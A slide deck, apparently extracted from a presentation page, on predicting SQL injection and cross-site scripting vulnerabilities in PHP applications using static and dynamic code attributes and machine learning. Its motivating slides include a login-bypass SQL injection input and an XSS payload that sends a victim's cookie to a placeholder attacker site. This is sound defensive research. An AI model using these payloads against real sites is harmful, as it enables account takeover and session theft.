Mining SQL Injection and Cross Site Scripting Vulnerabilities using Hybrid Program Analysis

Shar Lwin Khin, Tan Hee Beng Kuan
Information Engineering, Nanyang Technological University, Singapore
shar0035@e.ntu.edu.sg, ibktan@e.ntu.edu.sg

Lionel Briand
Interdisciplinary Centre for ICT Security, Reliability, and Trust, University of Luxembourg, Luxembourg
lionel.briand@uni.lu
Motivation
• Increasing number of vulnerabilities
• Developers lack security awareness
• Manual vulnerability audit is effort intensive
  
Related Work

Method                      Granularity   Accuracy   Scalability
Vuln. Prediction            ×             √          √
Static taint analysis       √             ×          √
Static & dynamic analysis   √             √          ×
???                         √             √          √
  
Problem Definition 1/2
• Input validation and sanitization are two common defense methods used in web applications
• Static attributes have been shown to be indicators of vulnerabilities, though not accurate enough
• Can we use static and dynamic attributes together, characterizing the implementations of these defense methods, as indicators?
• Machine learning to predict vulnerability based on attributes
  
Problem Definition 2/2
• Typical prediction models are classification-based
• Being supervised, their effectiveness depends on the availability of sufficient training data tagged with class labels
• Cluster analysis (CA) is a type of unsupervised learning method
• CA may be used if vulnerable instances can be distinguished from non-vulnerable instances based on the proposed attributes
  
Vulnerability Distributions
[Figure: vulnerability distributions. © Web Hacking Incident Database]
SQL Injection
• Cause: Inadequate validation and sanitization of user inputs used in queries

[Diagram: Hacker -> login.php -> Database]
Query built in login.php:
$q = "select * from user where name='".$name."' and pw='".$pw."'";
Input supplied by the hacker:
$name = ' or 1=1 --
Resulting query:
$q = "select * from user where name='' or 1=1--' and pw=''";
Result: unauthorized user information is returned. SQLI!
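The same failure mode can be reproduced outside PHP. The following is a minimal sketch in Python, assuming an in-memory SQLite table named `user` with made-up rows; the function names are hypothetical and this is not the code of login.php. It contrasts string concatenation with a parameterized query.

```python
import sqlite3

def make_db():
    # Hypothetical in-memory database with two illustrative accounts.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, pw TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)",
                     [("alice", "secret1"), ("bob", "secret2")])
    return conn

def login_vulnerable(conn, name, pw):
    # Mirrors the slide: user input is concatenated straight into the query text.
    q = "select * from user where name='" + name + "' and pw='" + pw + "'"
    return conn.execute(q).fetchall()

def login_parameterized(conn, name, pw):
    # Placeholders keep the input as data, so quotes in it cannot change the query.
    q = "select * from user where name=? and pw=?"
    return conn.execute(q, (name, pw)).fetchall()

conn = make_db()
attack = "' or 1=1 --"
leaked = login_vulnerable(conn, attack, "")
safe = login_parameterized(conn, attack, "")
print(len(leaked), len(safe))
```

With the concatenated query, the injected input turns the WHERE clause into a condition that is always true, so every row is returned; the parameterized query treats the same input as an ordinary (non-matching) name.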
Cross Site Scripting
• Cause: No sanity check of input before it is used in HTML documents

[Diagram: Hacker, Victim, travelerTip.php]
Inject script: <script>alert('xss!');</script>
Visit: http://travelingForum/travelerTip.php?Action=Post&Place=Greece&Tip=<Script>document.location='http://hackerSite/stealCookie.jsp?cookie='+document.cookie; </Script>
The injected script is executed on the victim's browser. XSS!
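As an illustration of the missing sanity check, here is a minimal sketch in Python, assuming a page that simply wraps the submitted tip in a paragraph. The two render functions are hypothetical and are not taken from travelerTip.php; `html.escape` is from the Python standard library.

```python
import html

def render_tip_vulnerable(tip):
    # Input is placed into the HTML document unchanged, as in the slide's scenario.
    return "<p>" + tip + "</p>"

def render_tip_escaped(tip):
    # html.escape turns <, >, & and quotes into entities, so the browser shows text.
    return "<p>" + html.escape(tip, quote=True) + "</p>"

payload = "<script>alert('xss!');</script>"
unsafe_page = render_tip_vulnerable(payload)
safe_page = render_tip_escaped(payload)
print(safe_page)
```

The escaped page no longer contains a script element, so the payload is displayed rather than executed.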
Vulnerability Prediction Principles 1/2
• Using hybrid code attributes to predict vulnerabilities
• Based on both static and dynamic program analyses
• Input validation checks and sanitization operations are mainly based on string operations
  • e.g., preg_replace("/<script/", "", $data)
• Classify the types of string operations applied according to their potential effects on the inputs before their use in security-sensitive statements (sinks)
  • e.g., echo $data; mysql_query($data)
• Such validation checks and operations can be identified by analyzing data dependence graphs
  
Vulnerability Prediction Principles 2/2
• Given the data dependence graph of a sink: by extracting the number of inputs, and the numbers and types of validation and sanitization functions from the graph, can we predict the sink's vulnerability?
[Figure: data dependence graph of a sink]
• E.g., if a sink uses five different inputs, there should be at least five input validation or sanitization functions.
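The idea of reading counts off a sink's data dependence graph can be sketched as follows. This is a toy illustration in Python under stated assumptions: the graph, the node names, and the node classifications are all hypothetical, and the traversal is a plain backward reachability walk rather than the authors' analysis.

```python
from collections import Counter

# Hypothetical data dependence graph: each node maps to the nodes it depends on.
DEPENDS_ON = {
    "sink": ["q"],
    "q": ["name_clean", "pw"],
    "name_clean": ["name"],
    "name": [],
    "pw": [],
}

# Hypothetical node classifications, reusing attribute names from the deck.
NODE_CLASS = {
    "sink": None,
    "q": "Propagate",
    "name_clean": "SQLI-sanitization",
    "name": "Client",
    "pw": "Client",
}

def attribute_counts(sink, depends_on, node_class):
    """Count node classifications reachable backwards from the sink."""
    counts = Counter()
    seen = set()
    stack = [sink]
    while stack:
        node = stack.pop()
        if node in seen:
            continue
        seen.add(node)
        label = node_class.get(node)
        if label is not None:
            counts[label] += 1
        stack.extend(depends_on.get(node, []))
    return counts

counts = attribute_counts("sink", DEPENDS_ON, NODE_CLASS)
inputs = counts["Client"]
sanitizers = counts["SQLI-sanitization"] + counts["XSS-sanitization"]
# The slide's rule of thumb: fewer sanitizers than inputs is a warning sign.
suspicious = sanitizers < inputs
print(dict(counts), suspicious)
```

In this toy graph the sink depends on two client inputs but only one sanitization node, so the rule of thumb flags it.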
Static and Dynamic Classification
• A node is classified statically from the language built-in functions that have specific security purposes, the language operators, and the predefined language parameters it uses.
  • e.g., addslashes($input), $_GET, $a = $b . $c
• But it is classified dynamically if the node invokes user-defined functions or some built-in functions such as string replacement.
  • e.g., $sanitized = preg_replace("/<+/", "", $input)
  • The function code is executed using a set of predefined test inputs, and the final values of the test input variables are searched for malicious characters.
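The dynamic step can be sketched as follows: run the function on fixed test inputs and search the results for characters of interest. This is a minimal Python sketch; the test inputs and helper names are assumptions for illustration, since the deck does not list the inputs it used.

```python
import re

# Hypothetical test inputs; the deck does not list the ones it used.
TEST_INPUTS = ("<script>alert(1)</script>", "<<b>>bold", "plain text")

def strip_angle_open(value):
    # Python analogue of the slide's preg_replace example: remove runs of '<'.
    return re.sub(r"<+", "", value)

def identity(value):
    # A function that performs no filtering at all, for contrast.
    return value

def filters_characters(func, bad_chars, test_inputs=TEST_INPUTS):
    """Return True if no output of func contains any character in bad_chars."""
    for value in test_inputs:
        result = func(value)
        if any(ch in result for ch in bad_chars):
            return False
    return True

print(filters_characters(strip_angle_open, "<"))
print(filters_characters(identity, "<"))
```

A node invoking `strip_angle_open` would be credited with filtering `<`, while one invoking `identity` would not. The same check with `"<>"` fails for `strip_angle_open`, because `>` survives.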
  
Hybrid Code Attributes

ID  Attribute Name      Description
Static attributes
1   Client              The number of nodes that access data from HTTP request parameters
2   File                The number of nodes that access data from files
3   Database            The number of nodes that access data from a database
4   Text-database       Boolean value 'TRUE' if there is any text-based data accessed from a database; 'FALSE' otherwise
5   Other-database      Boolean value 'TRUE' if there is any data except text-based data accessed from a database; 'FALSE' otherwise
6   Session             The number of nodes that access data from persistent data objects
7   Uninit              The number of nodes that reference uninitialized program variables
8   SQLI-sanitization   The number of nodes that apply standard sanitization functions for preventing SQLI issues
9   XSS-sanitization    The number of nodes that apply standard sanitization functions for preventing XSS issues
10  Numeric-casting     The number of nodes that type-cast data into a numeric type
11  Numeric-type-check  The number of nodes that perform a numeric data type check
12  Encoding            The number of nodes that encode data into a certain format
13  Un-taint            The number of nodes that return predefined information or information not influenced by external users
14  Boolean             The number of nodes that invoke functions that return a Boolean value
15  Propagate           The number of nodes that propagate the partial or complete value of an input
Dynamic attributes
16  Numeric             The number of nodes that invoke functions that return only numeric, mathematical, or dash characters
17  LimitLength         The number of nodes that invoke string-length limiting functions
18  URL                 The number of nodes that invoke path-filtering functions
19  EventHandler        The number of nodes that invoke event-handler filtering functions
20  HTMLTag             The number of nodes that invoke HTML-tag filtering functions
21  Delimiter           The number of nodes that invoke delimiter filtering functions
22  AlternateEncode     The number of nodes that invoke alternate-character-encoding filtering functions
Target attribute
23  Vulnerable?         Indicates a class label: Vulnerable or Not-Vulnerable
Sample Attribute Vectors
• Each sink would be represented by a 23-dimensional attribute vector.
• Sample attribute vectors (Session, XSS-sanit, Un-taint, Delimiter, Propagate, …, Vulnerable?):
  • (2, 4, 0, 0, 2, …, Not-Vulnerable)
  • (1, 0, 1, 1, 7, …, Vulnerable)
  	
  
Supervised Vulnerability Prediction
• Data Preprocessing
  • Normalization
  • Principal Component Analysis
• Classifiers
  • Logistic Regression: regression analysis
  • Multi-Layer Perceptron: neural network analysis
• Training & Testing: 10-fold cross validation
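Two of the steps named above, normalization and the 10-fold partition, can be sketched in a few lines. This Python sketch assumes min-max scaling and a simple interleaved fold assignment; the deck specifies neither, and PCA and the classifiers themselves are left out. The sample vectors are hypothetical.

```python
def min_max_normalize(rows):
    """Scale each column of a list of numeric rows into [0, 1]."""
    columns = list(zip(*rows))
    lows = [min(col) for col in columns]
    highs = [max(col) for col in columns]
    normalized = []
    for row in rows:
        normalized.append([
            (value - lo) / (hi - lo) if hi > lo else 0.0
            for value, lo, hi in zip(row, lows, highs)
        ])
    return normalized

def k_fold_indices(n_samples, k=10):
    """Yield (train, test) index lists; each sample is tested exactly once."""
    indices = list(range(n_samples))
    for fold in range(k):
        test = indices[fold::k]
        test_set = set(test)
        train = [i for i in indices if i not in test_set]
        yield train, test

# Hypothetical attribute vectors (five numeric attributes per sink).
vectors = [[2, 4, 0, 0, 2], [1, 0, 1, 1, 7], [0, 2, 0, 1, 3], [3, 1, 1, 0, 5]]
scaled = min_max_normalize(vectors)
folds = list(k_fold_indices(20, k=10))
print(scaled[0], len(folds))
```

In each of the ten rounds a classifier would be trained on the `train` indices and evaluated on the `test` indices, and the measures would then be averaged over the rounds.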
  
	
  
Unsupervised Vulnerability Prediction
• Use the same data preprocessing activities as the supervised models
• K-means cluster analysis based on two assumptions
  • Non-vulnerable sinks are much more frequent than vulnerable sinks
  • Vulnerable sinks have different characteristics from non-vulnerable sinks
• Label clusters as Vulnerable or Non-Vulnerable:
  • K=4: Maximum number of clusters
  • %Normal=12: Minimum size of non-vulnerable cluster
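One way to read the labeling step is sketched below in Python. It assumes that %Normal is a percentage of all sinks and that any cluster at least that large is labeled Non-Vulnerable; this interpretation, the function name, and the cluster assignments are assumptions for illustration, and the k-means step itself is not shown.

```python
from collections import Counter

def label_clusters(assignments, pct_normal=12):
    """Label each cluster by its share of all sinks.

    Assumption: a cluster holding at least pct_normal percent of the sinks
    is treated as Non-Vulnerable; smaller clusters are treated as Vulnerable.
    """
    sizes = Counter(assignments)
    total = len(assignments)
    labels = {}
    for cluster, size in sizes.items():
        share = 100.0 * size / total
        labels[cluster] = "Non-Vulnerable" if share >= pct_normal else "Vulnerable"
    return labels

# Hypothetical k-means output for 50 sinks and K = 4 clusters.
assignments = [0] * 30 + [1] * 15 + [2] * 3 + [3] * 2
labels = label_clusters(assignments, pct_normal=12)
print(labels)
```

Under this reading the rule only works when vulnerable sinks really are rare: if they formed a large cluster, that cluster would be labeled Non-Vulnerable.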
  
Case Study
• Six open source web applications (PHP):
  • Known vulnerable
  • Functionalities: school admin, forum, news, content, database management
  • Sizes: from 2k to 44k LOC
• Vulnerability identification: manual & vuln. databases (Bugtraq, CVE)
  
Prototype Tool
[Figure: Architecture of PhpMiner; the diagram includes Weka]
Experiment & Result 1/2
• LR performs better than MLP
• Maximum analysis time: 2 hours, average ½ hour
• Accuracy:
  • Shin et al. TSE'11 [3] achieved recall > 80 and pf < 25
  • Pixy S&P'06 [1] reported pf > 20. Too many false positives!
  • Ardilla ICSE'09 [4] reported up to 50% of paths left unexplored.... False negatives?
  • Our result: recall = 90, pf = 5

Classification results of predictors built from hybrid attributes (all measures in %):

Data                                 Classifier   Recall   False alarm   Precision
schmate-html                         LR           99       3             98
                                     MLP          99       0             100
faqforge-html                        LR           89       5             94
                                     MLP          91       5             94
utopia-html                          LR           94       1             94
                                     MLP          94       2             89
phorum-html                          LR           78       1             70
                                     MLP          33       0             100
cutesite-html                        LR           68       9             61
                                     MLP          78       8             67
myadmin-html                         LR           85       1             89
                                     MLP          75       1             83
Average results on XSS prediction    LR           86       3             84
                                     MLP          78       3             89
schmate-sql                          LR           97       8             98
                                     MLP          96       35            92
faqforge-sql                         LR           88       4             94
                                     MLP          88       4             94
phorum-sql                           LR           100      3             63
                                     MLP          0        1             0
cutesite-sql                         LR           91       14            89
                                     MLP          89       18            86
Average results on SQLI prediction   LR           94       7             86
                                     MLP          68       15            68
Overall average                      LR           90       5             85
                                     MLP          74       8             81
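The deck does not spell out the three measures. The Python sketch below uses their usual confusion-matrix definitions (recall = TP/(TP+FN), false alarm or pf = FP/(FP+TN), precision = TP/(TP+FP)) and assumes these are the ones intended. The function name and the counts are hypothetical and are not taken from the case study.

```python
def prediction_measures(tp, fp, tn, fn):
    """Return (recall, false_alarm, precision) in percent; None when undefined."""
    def pct(numerator, denominator):
        return None if denominator == 0 else 100.0 * numerator / denominator
    recall = pct(tp, tp + fn)        # share of vulnerable sinks that were flagged
    false_alarm = pct(fp, fp + tn)   # share of non-vulnerable sinks that were flagged (pf)
    precision = pct(tp, tp + fp)     # share of flagged sinks that are vulnerable
    return recall, false_alarm, precision

# Hypothetical confusion-matrix counts, not taken from the case study.
print(prediction_measures(tp=9, fp=1, tn=19, fn=1))
print(prediction_measures(tp=0, fp=0, tn=20, fn=10))
```

The second call shows why precision can be undefined: when a predictor flags no sink at all, TP + FP is zero and the ratio has no value.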
Experiment & Result 2/2

k-means clustering analysis results on the datasets which have < 40% vulnerable sinks (all measures in %):

Data            Recall   False alarm   Precision
utopia-html     100      13            65
phorum-html     56       11            16
cutesite-html   70       20            41
myadmin-html    55       8             33
phorum-sql      100      7             38
Average         76       12            39

k-means clustering analysis results on the datasets which have ≥ 40% vulnerable sinks (all measures in %):

Data            Recall   False alarm   Precision
schmate-html    9        0             100
faqforge-html   26       0             100
schmate-sql     3        32            29
faqforge-sql    0        0             undefined
cutesite-sql    0        0             undefined
Average         8        6             undefined

• When assumptions are not met, clustering does not work!
Limitations
• Supervised learning requires sufficient labeled data for training
• Unsupervised learning relies on some assumptions, which are not always true: applicable for most commercial systems?
• For unsupervised learning, tuning the parameters is required:
  • K: Maximum number of clusters
  • %Normal: Minimum size of non-vulnerable cluster
  
	
  
Conclusion
• Security auditing by providing probabilistic alerts about vulnerable code statements.
• Propose hybrid (static and dynamic) code attributes for vulnerability prediction using machine learning
  • Attributes characterize common input validation and sanitization code patterns, without expensive analysis
  • Scalability: < 2 hours on a regular PC
• Both supervised learning and unsupervised learning methods were used
  • Supervised learning accuracy: 90% recall, 85% precision
  • Unsupervised learning: lower accuracy, applicability?
  
Future Work
• Semi-supervised learning
• Combining data dependency information with control dependency information
• Address other types of similar vulnerabilities by considering other types of code patterns
  
The End!
http://sharlwinkhin.com
Thank You!
Questions?
References
1. N. Jovanovic, C. Kruegel, and E. Kirda, "Pixy: a static analysis tool for detecting web application vulnerabilities," in IEEE Symposium on Security and Privacy, 2006, pp. 258-263.
2. D. Balzarotti et al., "Saner: composing static and dynamic analysis to validate sanitization in web applications," in IEEE Symposium on Security and Privacy, 2008, pp. 387-401.
3. Y. Shin, A. Meneely, L. Williams, and J. A. Osborne, "Evaluating complexity, code churn, and developer activity metrics as indicators of software vulnerabilities," IEEE Transactions on Software Engineering, vol. 37 (6), pp. 772-787, 2011.
4. A. Kieżun, P. J. Guo, K. Jayaraman, and M. D. Ernst, "Automatic creation of SQL injection and cross-site scripting attacks," in Proceedings of the 31st International Conference on Software Engineering, Vancouver, BC, 2009, pp. 199-209.
5. RSnake, http://ha.ckers.org, accessed March 2012.
6. I. H. Witten and E. Frank, Data Mining, 2nd ed., Morgan Kaufmann, 2005.
  
	
  

Mais conteúdo relacionado

Mais procurados

Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanHybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanClubHack
 
IEEE ACM Studying the Relationship between Exception Handling Practices and P...
IEEE ACM Studying the Relationship between Exception Handling Practices and P...IEEE ACM Studying the Relationship between Exception Handling Practices and P...
IEEE ACM Studying the Relationship between Exception Handling Practices and P...Gui Padua
 
Software Birthmark for Theft Detection of JavaScript Programs: A Survey
Software Birthmark for Theft Detection of JavaScript Programs: A Survey Software Birthmark for Theft Detection of JavaScript Programs: A Survey
Software Birthmark for Theft Detection of JavaScript Programs: A Survey Swati Patel
 
Analysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-Studio
Analysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-StudioAnalysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-Studio
Analysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-StudioPVS-Studio
 
Fraud detection system
Fraud detection systemFraud detection system
Fraud detection systembaladutt
 
CIS14: Developing with OAuth and OIDC Connect
CIS14: Developing with OAuth and OIDC ConnectCIS14: Developing with OAuth and OIDC Connect
CIS14: Developing with OAuth and OIDC ConnectCloudIDSummit
 
DRONE: A Tool to Detect and Repair Directive Defects in Java APIs Documentation
DRONE: A Tool to Detect and Repair Directive Defects in Java APIs DocumentationDRONE: A Tool to Detect and Repair Directive Defects in Java APIs Documentation
DRONE: A Tool to Detect and Repair Directive Defects in Java APIs DocumentationSebastiano Panichella
 
#nullblr bachav manual source code review
#nullblr bachav manual source code review#nullblr bachav manual source code review
#nullblr bachav manual source code reviewSantosh Gulivindala
 
SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...
SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...
SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...Akram El-Korashy
 

Mais procurados (9)

Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanHybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
 
IEEE ACM Studying the Relationship between Exception Handling Practices and P...
IEEE ACM Studying the Relationship between Exception Handling Practices and P...IEEE ACM Studying the Relationship between Exception Handling Practices and P...
IEEE ACM Studying the Relationship between Exception Handling Practices and P...
 
Software Birthmark for Theft Detection of JavaScript Programs: A Survey
Software Birthmark for Theft Detection of JavaScript Programs: A Survey Software Birthmark for Theft Detection of JavaScript Programs: A Survey
Software Birthmark for Theft Detection of JavaScript Programs: A Survey
 
Analysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-Studio
Analysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-StudioAnalysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-Studio
Analysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-Studio
 
Fraud detection system
Fraud detection systemFraud detection system
Fraud detection system
 
CIS14: Developing with OAuth and OIDC Connect
CIS14: Developing with OAuth and OIDC ConnectCIS14: Developing with OAuth and OIDC Connect
CIS14: Developing with OAuth and OIDC Connect
 
DRONE: A Tool to Detect and Repair Directive Defects in Java APIs Documentation
DRONE: A Tool to Detect and Repair Directive Defects in Java APIs DocumentationDRONE: A Tool to Detect and Repair Directive Defects in Java APIs Documentation
DRONE: A Tool to Detect and Repair Directive Defects in Java APIs Documentation
 
#nullblr bachav manual source code review
#nullblr bachav manual source code review#nullblr bachav manual source code review
#nullblr bachav manual source code review
 
SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...
SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...
SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...
 

Semelhante a Mining SQLi and XSS Vulnerabilities Using Hybrid Analysis

DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityCoverity
 
Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...
Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...
Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...Priyanka Aash
 
Ebu class edgescan-2017
Ebu class edgescan-2017Ebu class edgescan-2017
Ebu class edgescan-2017Eoin Keary
 
QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...
QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...
QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...GeeksLab Odessa
 
Application Security
Application SecurityApplication Security
Application Securityflorinc
 
What are the best tools used in cybersecurity in 2023.pdf
What are the best tools used in cybersecurity in 2023.pdfWhat are the best tools used in cybersecurity in 2023.pdf
What are the best tools used in cybersecurity in 2023.pdftsaaroacademy
 
DEF CON 27 - AMIT WAISEL and HILA COHEN - malproxy
DEF CON 27 - AMIT WAISEL and HILA COHEN - malproxyDEF CON 27 - AMIT WAISEL and HILA COHEN - malproxy
DEF CON 27 - AMIT WAISEL and HILA COHEN - malproxyFelipe Prado
 
Integris Security - Hacking With Glue ℠
Integris Security - Hacking With Glue ℠Integris Security - Hacking With Glue ℠
Integris Security - Hacking With Glue ℠Integris Security LLC
 
VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...
VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...
VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...Stefano Dalla Palma
 
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Chetan Khatri
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxcgt38842
 
Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...
Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...
Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...Sonatype
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxnmk42194
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxjohnpragasam1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxazida3
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxFernandoVizer
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedYury Chemerkin
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information SecuritySplunk
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information SecurityShannon Cuthbertson
 

Semelhante a Mining SQLi and XSS Vulnerabilities Using Hybrid Analysis (20)

DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first Security
 
Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...
Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...
Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...
 
Ebu class edgescan-2017
Ebu class edgescan-2017Ebu class edgescan-2017
Ebu class edgescan-2017
 
QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...
QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...
QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...
 
Application Security
Application SecurityApplication Security
Application Security
 
What are the best tools used in cybersecurity in 2023.pdf
What are the best tools used in cybersecurity in 2023.pdfWhat are the best tools used in cybersecurity in 2023.pdf
What are the best tools used in cybersecurity in 2023.pdf
 
DEF CON 27 - AMIT WAISEL and HILA COHEN - malproxy
DEF CON 27 - AMIT WAISEL and HILA COHEN - malproxyDEF CON 27 - AMIT WAISEL and HILA COHEN - malproxy
DEF CON 27 - AMIT WAISEL and HILA COHEN - malproxy
 
Code securely
Code securelyCode securely
Code securely
 
Integris Security - Hacking With Glue ℠
Integris Security - Hacking With Glue ℠Integris Security - Hacking With Glue ℠
Integris Security - Hacking With Glue ℠
 
VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...
VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...
VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...
 
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...
Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...
Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learned
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information Security
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information Security
 

Mais de Lionel Briand

Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalLionel Briand
 
Large Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLarge Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLionel Briand
 
Metamorphic Testing for Web System Security
Metamorphic Testing for Web System SecurityMetamorphic Testing for Web System Security
Metamorphic Testing for Web System SecurityLionel Briand
 
Simulator-based Explanation and Debugging of Hazard-triggering Events in DNN-...
Simulator-based Explanation and Debugging of Hazard-triggering Events in DNN-...Simulator-based Explanation and Debugging of Hazard-triggering Events in DNN-...
Simulator-based Explanation and Debugging of Hazard-triggering Events in DNN-...Lionel Briand
 
Fuzzing for CPS Mutation Testing
Fuzzing for CPS Mutation TestingFuzzing for CPS Mutation Testing
Fuzzing for CPS Mutation TestingLionel Briand
 
Data-driven Mutation Analysis for Cyber-Physical Systems
Data-driven Mutation Analysis for Cyber-Physical SystemsData-driven Mutation Analysis for Cyber-Physical Systems
Data-driven Mutation Analysis for Cyber-Physical SystemsLionel Briand
 
Many-Objective Reinforcement Learning for Online Testing of DNN-Enabled Systems
Many-Objective Reinforcement Learning for Online Testing of DNN-Enabled SystemsMany-Objective Reinforcement Learning for Online Testing of DNN-Enabled Systems
Many-Objective Reinforcement Learning for Online Testing of DNN-Enabled SystemsLionel Briand
 
ATM: Black-box Test Case Minimization based on Test Code Similarity and Evolu...
